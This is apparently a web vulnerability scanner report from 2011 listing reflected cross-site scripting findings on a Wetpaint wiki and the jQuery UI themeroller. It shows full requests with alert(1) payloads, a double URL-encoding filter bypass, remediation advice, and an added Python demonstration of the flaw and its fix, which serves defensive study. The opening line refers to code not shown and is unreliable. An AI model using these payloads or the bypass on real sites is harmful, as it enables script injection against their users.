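The two content functions are deliberately minimal lexers: the JavaScript one honours backslash escapes, the HTML one does not, and that single difference is what separates the gigaom.com echo (quote escaped, attribute still closed) from a working fix. Hex-escaping every non-alphanumeric character is more than strictly necessary for a JS string, but it sidesteps the usual omissions (forward slash, line separators, angle brackets) without a per-character allow-list to maintain.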
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 was submitted in the REST URL parameter 2. This input was echoed as 6860c<script>alert(1)</script>e2410f7e441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /account/ellerburnes6860c%253cscript%253ealert%25281%2529%253c%252fscript%253ee2410f7e441 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:07:22 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui7tLDEkikBLW; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=CA2FCF825EAEF0C3F31FF2BEAE557522; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:07:22 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24947
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 was submitted in the REST URL parameter 2. This input was echoed as ae99d<script>alert(1)</script>3618331fda0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode; removing the redundant decode closes this bypass. In any case, the application should perform its input validation only after all canonicalisation (including any custom decoding) has been carried out, so that the filter inspects the same bytes that will reach the page. Independently of the decoding order, the value should be HTML-encoded at the point where it is written into the response, since that output encoding does not depend on the character blacklist being complete.
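The decode-then-validate ordering behind this finding, shown as an added example in Python that is not part of the original report or of the application's code. It models the chain described above: the container performs one URL-decode, the application's blacklist filter checks for angle brackets, and a custom second decode runs afterwards. The blacklist, the page template and the sample path segments are constructed for illustration.

```python
import html
from urllib.parse import unquote

# Constructed sample path segments in the shape the report shows. The random
# marker text is illustrative; these are assumptions, not captured traffic.
DOUBLE_ENCODED = "ae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0"
SINGLE_ENCODED = "ae99d%3cscript%3ealert%281%29%3c%2fscript%3e3618331fda0"

# Assumed blacklist: the characters the application appears to block.
BLOCKED = frozenset('<>"\'')


def container_decode(segment: str) -> str:
    """The one URL-decode the web server / servlet container already performs
    on the request path before the application sees the value."""
    return unquote(segment)


def passes_filter(value: str) -> bool:
    return not any(ch in BLOCKED for ch in value)


def render_vulnerable(segment: str):
    """Validate, then apply a custom second URL-decode, then write the value
    into the page unencoded. This is the ordering the finding describes:
    %253c -> %3c passes the filter, and the second decode yields '<'.
    Returns None when the filter rejects the input."""
    once = container_decode(segment)
    if not passes_filter(once):
        return None
    twice = unquote(once)  # the redundant custom decode
    return f"<p>{twice}</p>"


def render_hardened(segment: str):
    """No second decode (the container's decode is the canonical form), the
    filter runs on that canonical form, and the value is HTML-encoded on
    output so the page does not rely on the blacklist at all."""
    canonical = container_decode(segment)
    if not passes_filter(canonical):
        return None
    return f"<p>{html.escape(canonical, quote=True)}</p>"


def render_hardened_with_second_decode(segment: str):
    """If a second decode is genuinely required, it is canonicalisation and
    must run before validation, not after it. Output is still encoded."""
    canonical = unquote(container_decode(segment))
    if not passes_filter(canonical):
        return None
    return f"<p>{html.escape(canonical, quote=True)}</p>"


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(DOUBLE_ENCODED))
    print("hardened:  ", render_hardened(DOUBLE_ENCODED))
    print("hardened, second decode before validation:",
          render_hardened_with_second_decode(DOUBLE_ENCODED))
```

The vulnerable path emits a live `<script>` element for the double-encoded input while correctly rejecting the single-encoded one, which is exactly the behaviour the scanner observed; both hardened paths either reject the input or emit it as inert text.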
Request
GET /account/heidiannaae99d%253cscript%253ealert%25281%2529%253c%252fscript%253e3618331fda0 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:07:28 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1ScTwMqZAeui+hCCPQX9ohd; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=BE9914FABF088BEA75986B4ACEE64FA4; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:07:28 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24940

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 was submitted in the REST URL parameter 2. This input was echoed as b03df<script>alert(1)</script>58156201246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's decode turns %253c into %3c, which contains nothing the filter objects to, and the application's own second decode then turns %3c into <.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will already have carried out one decode; removing the redundant decode closes this bypass. In any case, the application should perform its input validation only after all canonicalisation (including any custom decoding) has been carried out, so that the filter inspects the same bytes that will reach the page. Independently of the decoding order, the value should be HTML-encoded at the point where it is written into the response, since that output encoding does not depend on the character blacklist being complete.
Request
GET /account/scottpjb03df%253cscript%253ealert%25281%2529%253c%252fscript%253e58156201246 HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:07:36 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=; Domain=htcwiki.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Q1eFPEj9bv+7BfltWrJMEs; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=65C7BB98781E26CF5BC6008F3D3429ED; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:07:36 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1214<a>0a9fac97bad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the evidence response below is served as text/xml rather than HTML: the value is reflected inside the <message> element of an XML error document and again inside the CDATA section of a stack trace. Because the injected <a> is never closed, the document is not well-formed XML and a browser will display a parse error rather than render it, which is a more likely explanation for the failed proof of concept than any filtering. Separately, the error body discloses internal class and method names and source line numbers (for example com.wetpaint.type.MetadataName.valueOf and WikiDatumAction.executeGet); such stack traces should not be returned to clients.
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:59:04 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: JSESSIONID=8B146C25F56ABEDF2E3CA5EA6487F687; Path=/
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:59:04 GMT
Vary: Accept-Encoding
Content-Type: text/xml;charset=UTF-8
Content-Length: 3791

<?xml version="1.0" encoding="UTF-8"?><error status="2002985068"><message>No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad</message><stack><![CDATA[java.lang.IllegalArgumentException: No enum const class com.wetpaint.type.MetadataName.WELCOME_ANNOUNCEMENTb1214<a>0a9fac97bad at java.lang.Enum.valueOf(Enum.java:196) at com.wetpaint.type.MetadataName.valueOf(MetadataName.java:3) at com.wetpaint.api.action.WikiDatumAction.executeGet(WikiDatumAction.java:39) at com.wetpaint.a ...[SNIP]...
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd697"><script>alert(1)</script>0e06b0d0009 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response: the leading " terminates the attribute value and the following > terminates the tag, so the remainder of the payload is parsed as a new <script> element.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The same issue is reported for each of the other themeroller colour and opacity parameters below, so the fix (HTML attribute encoding at the point of output, plus a strict format check for hex colour and numeric values) should be applied to the whole parameter set rather than to the individual parameters listed.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9cd697"><script>alert(1)</script>0e06b0d0009&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a43"><script>alert(1)</script>5df749b98b5 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd86a43"><script>alert(1)</script>5df749b98b5&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a4f5"><script>alert(1)</script>14b71544016 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc1a4f5"><script>alert(1)</script>14b71544016&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcf1"><script>alert(1)</script>0d3c47e2367 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecfdcf1"><script>alert(1)</script>0d3c47e2367&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f53"><script>alert(1)</script>2c480b0a63e was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc41f53"><script>alert(1)</script>2c480b0a63e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9d"><script>alert(1)</script>7040f13f8da was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec8838c9d"><script>alert(1)</script>7040f13f8da&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09db"><script>alert(1)</script>f9cc1bf1ccd was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5f09db"><script>alert(1)</script>f9cc1bf1ccd&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91800"><script>alert(1)</script>56b1ce80b05 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
